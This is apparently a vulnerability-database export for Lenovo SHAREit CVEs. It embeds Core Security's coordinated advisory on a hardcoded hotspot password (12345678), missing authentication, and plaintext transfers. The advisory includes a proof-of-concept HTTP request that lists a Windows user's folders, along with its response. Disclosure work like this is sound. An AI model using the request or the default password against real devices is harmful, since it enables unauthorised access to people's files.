"version": "2.5.1.1"
},
{
"model": "shareit for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "lenovo",
"version": "2.5.1.1"
},
{
"model": "shareit for android 3.0.18 ww",
"scope": null,
"trust": 0.3,
"vendor": "lenovo",
"version": null
}
],
"sources": [
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001338"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-637"
},
{
"db": "NVD",
"id": "CVE-2016-1491"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:lenovo:shareit",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001338"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ivan Huertas from Core Security Consulting Team.",
"sources": [
{
"db": "BID",
"id": "81748"
}
],
"trust": 0.3
},
"cve": "CVE-2016-1491",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"id": "CVE-2016-1491",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:A/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.5,
"id": "VHN-90310",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:A/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2016-1491",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-1491",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2016-1491",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201601-637",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-90310",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90310"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001338"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-637"
},
{
"db": "NVD",
"id": "CVE-2016-1491"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows, when configured to receive files, has a hardcoded password of 12345678, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area. Lenovo ShareIT is prone to multiple security vulnerabilities. \nAn attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) for Windows is a set of file sharing software based on Windows system of China Lenovo (Lenovo). There is a security vulnerability in the Wifi hotspot component of Lenovo SHAREit for Windows versions earlier than 3.2.0. A remote attacker could exploit this vulnerability using a location within WLAN coverage to gain access. 1. Advisory Information\n\nTitle: Lenovo ShareIT Multiple Vulnerabilities\nAdvisory ID: CORE-2016-0002\nAdvisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities\nDate published: 2016-01-25\nDate of last update: 2016-01-22\nVendors contacted: Lenovo\nRelease mode: Coordinated release\n\n2. Vulnerability Information\n\nClass: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862]\nImpact: Security bypass, Information leak\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492\n\n \n\n3. Vulnerability Description\n\nSHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers. \n\n4. Vulnerable Packages\n\nLenovo SHAREit for Android 3.0.18_ww\nLenovo SHAREit for Windows 2.5.1.1\nOther products and versions may also be affected, but they were not tested. \n\n5. Vendor Information, Solutions and Workarounds\n\nLenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues. \n\nThe new version of the products can be found here [1]. \n\n6. Credits\n\nThis vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaqu\u00edn Rodr\u00edguez Varela from Core Security Advisories Team. \n\n \n\n7. Technical Description / Proof of Concept Code\n\n7.1. Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same. \n\n7.2. Remote browsing of file system on Lenovo SHAREit for Windows\n\n[CVE-2016-1490] When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP Request to the WebServer launched by Lenovo SHAREit. The following request was used to perform this action:\n\n \nPOST /list?type=file\u0026path=C%3A%5CUsers\\admin HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)\nHost: 192.168.173.1:2999\nConnection: Keep-Alivek\nAccept-Encoding: gzip\nContent-Length: 0\nHTTP/1.0 200 OK\nContent-Length: 2426\n\n\n{\"containers\":[{\"filepath\":\"C:\\\\Users\\\\admin\\\\Contacts\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Contacts\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Contacts\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Desktop\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Desktop\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Desktop\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Documents\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Documents\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Documents\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Downloads\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Downloads\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Downloads\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Favorites\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Favorites\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Favorites\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Links\",\n\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Links\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Links\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Music\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Music\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\nMusic\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Pictures\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Pictures\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\nPictures\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Saved\nGames\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Saved\nGames\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Saved\nGames\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Searches\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Searches\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Searches\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Tracing\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Tracing\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Tracing\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Videos\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Videos\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\n\",\"type\":\"file\",\"ver\":\"\"}],\"filepath\":\"C:\\\\Users\\\\admin\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\",\"isloaded\":true,\"isroot\":false,\"isvolume\":false,\"name\":\"admin\",\"type\":\"file\",\"ver\":\"\"}\n \n7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit\n\n[CVE-2016-1489] The files are transfered via HTTP without encryption. An attacker that is able to sniff the network traffic could to view the data transferred or perform man in the middle attacks, for example by modifying the content of the transferred files. \n\n7.4. An attacker could connect to that HotSpot and capture the information transferred between those devices. \n\n \n\n8. Report Timeline\n\n2015-10-29: Core Security sent an initial notification to Lenovo. \n2015-10-29: Lenovo replied attaching their public PGP key. \n2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. \n2015-10-29: Lenovo replied their development team would review Core Security findings. \n2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. \n2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. \n2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. \n2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. \n2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. \n2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. \n2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. \n2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. \n2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. \n2015-11-23: Lenovo informed Core Security that they had forwarded Core\u0027s analysis to their development team. \n2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the \"secure mode\" and only used in the \"easy mode\". \n2015-12-06: Lenovo informed Core Security that they were still working on the schedule. \n2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. \n2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. \n2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. \n2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. \n2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn\u0027t planned a date for their advisory disclosure. \n2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. \n2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core\u0027s advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn\u0027t meet the Monday 11 deadline. \n2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. \n2016-01-06: Core Security sent Lenovo the draft version of the advisory. \n2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. \n2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. \n2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February\n2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. \n2016-01-08: Lenovo informed Core Security that they agreed to our terms. \n2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. \n2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. \n2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. \n2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. \n2016-01-19: Lenovo informed Core Security that they agreed to our request. \n2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. \n2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. \n2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. \n2016-01-25: Advisory CORE-2016-0002 published. \n9. References\n\n[1] http://shareit.lenovo.com/#DOWNLOAD. \n[2] http://www.lenovo.com. \n\n10. About CoreLabs\n\nCoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. \n\n11. About Core Security Technologies\n\nCore Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted research and leading-edge threat expertise from the company\u0027s Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. \n\n12. Disclaimer\n\nThe contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. PGP/GPG Keys\n\nThis advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1491"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001338"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "VULHUB",
"id": "VHN-90310"
},
{
"db": "PACKETSTORM",
"id": "135378"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-1491",
"trust": 2.9
},
{
"db": "PACKETSTORM",
"id": "135378",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001338",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201601-637",
"trust": 0.7
},
{
"db": "BID",
"id": "81748",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-90310",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90310"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001338"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-637"
},
{
"db": "NVD",
"id": "CVE-2016-1491"
}
]
},
"id": "VAR-201601-0462",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-90310"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:21:09.822000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "LEN-4058",
"trust": 0.8,
"url": "https://support.lenovo.com/jp/ja/product_security/len_4058"
},
{
"title": "Lenovo SHAREit Wifi hotspot Fixes for component security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59952"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001338"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-637"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90310"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001338"
},
{
"db": "NVD",
"id": "CVE-2016-1491"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"trust": 1.7,
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2016/jan/67"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/135378/lenovo-shareit-information-disclosure-hardcoded-password.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1491"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1491"
},
{
"trust": 0.3,
"url": "http://www.lenovo.com/ca/en/"
},
{
"trust": 0.1,
"url": "http://shareit.lenovo.com/#download."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1489"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1492"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1490"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1491"
},
{
"trust": 0.1,
"url": "http://www.lenovo.com."
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90310"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001338"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-637"
},
{
"db": "NVD",
"id": "CVE-2016-1491"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-90310"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001338"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-637"
},
{
"db": "NVD",
"id": "CVE-2016-1491"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-26T00:00:00",
"db": "VULHUB",
"id": "VHN-90310"
},
{
"date": "2016-01-25T00:00:00",
"db": "BID",
"id": "81748"
},
{
"date": "2016-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001338"
},
{
"date": "2016-01-25T20:02:22",
"db": "PACKETSTORM",
"id": "135378"
},
{
"date": "2016-01-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-637"
},
{
"date": "2016-01-26T19:59:06.233000",
"db": "NVD",
"id": "CVE-2016-1491"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-90310"
},
{
"date": "2016-01-25T00:00:00",
"db": "BID",
"id": "81748"
},
{
"date": "2016-02-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001338"
},
{
"date": "2016-01-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-637"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-1491"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-637"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Windows Edition Lenovo SHAREit of WiFi Vulnerability to gain access rights at hotspots",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001338"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-637"
}
],
"trust": 0.6
}
}
VAR-201601-0463
Vulnerability from variot - Updated: 2025-04-13 23:21The Wifi hotspot in Lenovo SHAREit before 3.5.48_ww for Android, when configured to receive files, does not require a password, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. http://cwe.mitre.org/data/definitions/284.htmlWireless by a third party LAN (WLAN) Access rights may be obtained by using the location within the reception area. Lenovo ShareIT is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) for Android is a set of file sharing software based on the Android system of China Lenovo (Lenovo). There is a security vulnerability in the Wifi hotspot component of Lenovo SHAREit for Android versions earlier than 3.5.48_ww. The vulnerability stems from the fact that the program does not ask for a password when it is used to receive files. 1. Advisory Information
Title: Lenovo ShareIT Multiple Vulnerabilities Advisory ID: CORE-2016-0002 Advisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities Date published: 2016-01-25 Date of last update: 2016-01-22 Vendors contacted: Lenovo Release mode: Coordinated release
- Vulnerability Information
Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862] Impact: Security bypass, Information leak Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492
- Vulnerability Description
SHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers.
- Vulnerable Packages
Lenovo SHAREit for Android 3.0.18_ww Lenovo SHAREit for Windows 2.5.1.1 Other products and versions may also be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Lenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues.
The new version of the products can be found here [1].
- Credits
This vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team.
- Technical Description / Proof of Concept Code
7.1. Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same.
7.2. Remote browsing of file system on Lenovo SHAREit for Windows
[CVE-2016-1490] When the WiFi network is on and connected with the default password (12345678), the files can be browsed but not downloaded by performing an HTTP Request to the WebServer launched by Lenovo SHAREit. The following request was used to perform this action:
POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) Host: 192.168.173.1:2999 Connection: Keep-Alivek Accept-Encoding: gzip Content-Length: 0 HTTP/1.0 200 OK Content-Length: 2426
{"containers":[{"filepath":"C:\Users\admin\Contacts","has_thumbnail":false,"id":"C:\Users\admin\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\Users\admin\Desktop","has_thumbnail":false,"id":"C:\Users\admin\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\Users\admin\Documents","has_thumbnail":false,"id":"C:\Users\admin\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\Users\admin\Downloads","has_thumbnail":false,"id":"C:\Users\admin\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\Users\admin\Favorites","has_thumbnail":false,"id":"C:\Users\admin\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\Users\admin\Links", "has_thumbnail":false,"id":"C:\Users\admin\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\Users\admin\Music","has_thumbnail":false,"id":"C:\Users\admin\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C:\Users\admin\Pictures","has_thumbnail":false,"id":"C:\Users\admin\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C:\Users\admin\Saved Games","has_thumbnail":false,"id":"C:\Users\admin\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C:\Users\admin\Searches","has_thumbnail":false,"id":"C:\Users\admin\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\Users\admin\Tracing","has_thumbnail":false,"id":"C:\Users\admin\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\Users\admin\Videos","has_thumbnail":false,"id":"C:\Users\admin\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C:\Users\admin","has_thumbnail":false,"id":"C:\Users\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}
7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit
